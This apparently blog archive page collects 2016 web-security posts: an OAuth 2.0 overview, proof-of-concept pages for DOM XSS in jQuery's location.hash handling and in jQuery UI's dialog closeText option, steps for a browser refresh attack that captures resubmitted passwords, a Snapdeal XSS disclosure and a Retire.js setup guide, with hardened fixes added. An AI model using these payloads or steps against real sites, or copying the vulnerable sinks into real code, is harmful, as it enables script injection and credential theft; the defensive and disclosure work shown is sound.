Posts

Showing posts from 2016

OAuth 2.0 Security - How to Secure your OAuth

OAuth 2.0 is an open standard for authorization, commonly used as a way for Internet users to log in to third-party websites using their accounts at Google, Facebook, Microsoft, Twitter, etc., without exposing their password to the third party. More generally, OAuth gives clients "secure delegated access" to server resources on behalf of a resource owner. Figure 1 shows the OAuth 2.0 exchange at an abstract level and illustrates the main entities. For most of this document the focus is on the interaction between the Client and the Authorization Server and between the Client and the Resource Server.

[Figure 1: abstract OAuth 2.0 protocol flow (RFC 6749, Figure 1). (A) Client -> Resource Owner: Authorization Request. (B) Resource Owner -> Client: Authorization Grant. The remaining steps of the figure are cut off in this excerpt.]

Location.Hash exploit || JQuery 1.11.3/1.7.2/1.6.1 Cross Site Scripting

This is the code for exploiting jQuery's handling of location.hash for DOM-based cross-site scripting. The page hands the URL fragment straight to $(). Because $() parses a string that begins with "<" as HTML rather than as a selector, a fragment such as #<img src=x onerror=alert(1)> creates the element and fires its handler; the payload never leaves the browser, so server-side filtering does not see it:

    <html>
        <head>
            <title>Jquery XSS Test 1</title>
            <script type="text/javascript"
                    src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js">
            </script>
            <script>
                // Vulnerable sink: the untrusted fragment goes to $() unchecked
                $(location.hash.split('#')[1]);
            </script>
        </head>
        <body>
            Jquery DOM XSS
        </body>
    </html>

OR,

    <html>
        <head>
            <title>Jquery XSS Test 2</title>
            <script type="text/javascript"
                    src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js">
            </script>
            <
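A hardened version of the same idea, added here as an example (not from the original post): the page still wants to select the element named by the fragment, but the fragment is vetted as a plain element id and looked up directly, so no string ever reaches $() where it could be parsed as HTML. The accepted id syntax is a policy chosen for this example, and the regex standing in for jQuery's "is this HTML?" test is an approximation of jQuery 1.9+ behaviour, included only so the check can be exercised without a browser.

```javascript
// Added example: vet location.hash before it reaches any jQuery sink.
// ID_RE is this example's own policy for what an element id may look like.
const ID_RE = /^[A-Za-z][\w-]*$/;

// Approximation of jQuery's (1.9+) rule for treating a $() argument as HTML:
// leading whitespace, then "<...>", nothing but non-">" after it.
const LOOKS_LIKE_HTML = /^\s*<[\w\W]+>[^>]*$/;
function jqueryTreatsAsHtml(str) {
  return LOOKS_LIKE_HTML.test(str);
}

// "#section-2" -> "section-2"; anything that is not a plain id -> null.
// Percent-decoding happens before the check so "%3Cimg..." cannot slip by.
function hashToId(hash) {
  const raw = hash.charAt(0) === '#' ? hash.slice(1) : hash;
  let decoded;
  try {
    decoded = decodeURIComponent(raw);
  } catch (e) {
    return null; // malformed %-escape
  }
  return ID_RE.test(decoded) ? decoded : null;
}

// Vulnerable form from the post, for contrast:
//   $(location.hash.split('#')[1]);
// Hardened form: resolve the id on the document, then wrap the node.
// Wrapping a DOM node never triggers jQuery's HTML parsing.
function selectFromHash(hash, doc, $) {
  const id = hashToId(hash);
  if (id === null) return null;
  const el = doc.getElementById(id);
  return el ? $(el) : null;
}
```

In a page this is called as `selectFromHash(location.hash, document, jQuery)`; the payload from the post yields `null` instead of a parsed `<img>` element.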

Jquery Vulnerability Finder - Retire.js

There are plenty of JavaScript libraries for use on the web and in Node.js apps out there. They greatly simplify development, but we need to stay up to date on their security fixes: "Using Components with Known Vulnerabilities" is now part of the OWASP Top 10, and insecure libraries can pose a huge risk to your web app. Retire.js identifies the library versions a page loads and reports those with known vulnerabilities.

Configure Retire.js for the Chrome browser:

Step#1: Download the Retire.js source from "https://github.com/RetireJS/retire.js" in zip format.
Step#2: Extract the zip to a folder.
Step#3: Open a Bash terminal (Cygwin on Windows) and execute the build_chrome.sh file.
Step#4: Open Chrome and go to the Extensions tab.
Step#5: Click "Load unpacked extensions" and browse to the chrome folder inside the extracted Retire.js folder.
Step#6: Click OK; the Retire.js extension is installed and listed in the tab. You can now use this extension to find vulnerable jQuery versions on the pages you visit.
Step#

Browser refresh attack

A browser refresh attack enables an adversary with access to the browser to recover application credentials by going back to a previous page and re-submitting the expired document. It works because the page that followed the login POST is kept in the browser history together with the POST body (the username and password); "Try again" followed by "Re-send data" replays that request.

How to perform:

1. Log in to https://<some-site>/login.
2. Once logged in, change your password and log out.
3. Press "Back" in the browser window. You will see the "Document Expired" page.
4. Start an intercepting proxy (Burp / Tamper Data).
5. Click "Try again" on the web page, then "Re-send data".
6. Watch the intercepted request: you will observe the login password being resubmitted by the browser, where it can be captured.

Snapdeal.com - Cross Site Scripting #Bug (DOM Based)

It was shocking to find an XSS vulnerability in Snapdeal.com. Recently I was using Snapdeal to purchase some goods, but when I tried my luck for XSS it was hardly a matter of seconds. Basically it was DOM-based XSS: the requested payload was not going to the server; instead it was being included in the DOM itself and executed in the browser. Proof of Concept: I used this URL with the bcrumbSearch parameter, which was used for searching the product name from the DOM. As you try to use this URL, the script gets executed in the browser and I got a million-dollar smile. Aftermath: As a responsible security researcher, I reported this issue to help@snapdeal.com and support@snapdeal.com. I haven't got any reply from their side yet, but meanwhile the issue got patched without any intimation.

JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4

I think nearly everyone gets a shock when Acunetix reports Cross Site Scripting in jQuery UI, but maybe many of you don't know how to exploit it. So here is the code that explains how to exploit vulnerabilities like this one. In jQuery UI before 1.12.0 the closeText option of the dialog widget is rendered as HTML rather than as text (CVE-2016-7103), so any user-controlled value an application passes into that option is a script injection point; the finding is reflected XSS only where the application actually copies request data into closeText. Place the script in the dialog options as shown in the code below (the `<\/script>` in the payload keeps the outer script block from being closed early):

    <!DOCTYPE html>
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
        <title>XSS in closeText option of component ui dialog</title>
        <script src="https://code.jquery.com/jquery-2.1.4.js"></script>
        <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
        <script>
            $(document).ready(function () {
                // Vulnerable sink: closeText is inserted as HTML in jQuery UI < 1.12.0
                $('#dialog').dialog({ closeText: ' <script>alert("XSS")<\/script> ' });
            });
        </script>
    </head>
    <body>
        <div id="dialog"></div>
    </body>
    </html>
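The fix is to upgrade to jQuery UI 1.12.0 or later. Where that is not immediately possible, user-controlled text headed for closeText has to be HTML-encoded first. The block below is an added example for this post (not code from the post or from jQuery UI) that does this only for affected versions: from 1.12.0 the library itself treats closeText as text, so encoding it again would display literal entities such as "&lt;". Where the untrusted value comes from is an application detail assumed here.

```javascript
// Added example: safe construction of dialog options from untrusted input.
// The source of the untrusted value and the option defaults are assumptions.

// Encode the five characters that matter in an HTML text or attribute context.
function escapeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, c => map[c]);
}

// jQuery UI before 1.12.0 renders closeText as HTML (CVE-2016-7103).
// uiVersion is what the page actually loaded, i.e. $.ui.version in a browser.
function closeTextIsHtml(uiVersion) {
  const [major, minor] = uiVersion.split('.').map(Number);
  return major < 1 || (major === 1 && minor < 12);
}

// Build the options object for $(...).dialog(). Only a non-empty string is
// accepted for closeText; anything else falls back to a fixed label.
function buildDialogOptions(untrusted, uiVersion) {
  const raw = typeof untrusted.closeText === 'string' && untrusted.closeText.trim() !== ''
    ? untrusted.closeText
    : 'Close';
  return {
    modal: true,
    closeText: closeTextIsHtml(uiVersion) ? escapeHtml(raw) : raw,
  };
}
```

In the page from the PoC this replaces the literal options: `$('#dialog').dialog(buildDialogOptions({ closeText: new URLSearchParams(location.search).get('close') }, $.ui.version));` renders the payload as visible text instead of running it on 1.11.4, and passes it through unchanged on 1.12.x where the library encodes it.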